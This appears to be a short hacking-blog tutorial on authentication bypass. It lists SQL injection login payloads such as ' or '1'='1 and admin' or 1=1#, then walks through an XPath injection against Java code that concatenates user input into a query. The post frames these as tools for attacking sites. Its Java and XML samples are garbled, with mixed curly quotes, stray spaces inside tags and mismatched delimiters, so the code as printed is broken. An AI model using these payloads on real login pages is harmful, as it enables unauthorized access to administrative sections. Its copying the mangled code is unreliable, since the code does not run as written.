Authentication Bypass — With X Path injection and SQL injection | CyberVerse
Authentication Bypass for sites and web applications is unauthorized access to the administrative section or sections of the site and scripts that provide direct interaction with the database and server file system.
Authentication Bypass can be performed by exploiting site code vulnerabilities, resource publishing errors, and also due to errors in the settings and vulnerabilities of the server software.
The ability to bypass the authentication (Authentication Bypass) on the site always leads to its hacking, as:
The attacker goes to the administrative section of the site with the maximum access level
An attacker gains access to private sections of the site, or files that directly interact with the database or server file system.
A few examples of Authentication Bypass-:
{ SQL injection Authentication Bypass }
Username = ‘ or ‘1’=’1
Password = ‘ or ‘1’=’1
OR
username= admin’ or 1=1#
password=’ or ‘1’=’1
OR (Where the Email address is necessary)
Username = admin@admin.com
Password = ‘ or ‘1’=’1
{ X Path injection Authentication Bypass }
Similar to SQL injection:
Part of the XML code of the site user database: base.xml
<? Xml version = ‘1.0’ encoding = ‘ISO-8859–1’?> <users>
<user>
<id> 1 </id>
<username> admin </ username>
<password> adminpass </password>
</user>
<user> <id> 2 </id>
<username> user </username>
<password> userpass </password>
</user>
…
</ users>
Authentication code for users / site administrators
String username = req.getParameter (“username ‘);
String password = req.getParameter (“ password’);
XPathFactory factory = XPathFactory.newInstance ();
Xpath xpath = factory.newXPath ();
File file = new File (“/ usr / webappdata / users.xml ‘);
InputSource src = new InputSource (new FileInputStream (file));
XPathExpression expr = xpath.compile (“ // users [username / text () =’ “+ username +” ‘and password / text () =’ “+ password + ‘’] / id / text () ‘);
String id = expr.evaluate (src);
Legal X Path user authentication request
users [username / text () = ‘admin’ and password / text () = ‘adminpass’] / id / text ()
XPath injection:
‘or’ 1 ‘=’ 1 ‘The request changed as a result of using XPath injection:
users [username / text () = ‘admin’ and password / text () = ‘’ or ‘1’ = ‘1’] / id / text ()
Result:-
Authentication of the attacker on the site. The
request will return the ID for the admin user with an empty password, provided 1 = 1 is true.
#HappyHacking #CyberVerse #BugBounty #Togherwehitharder
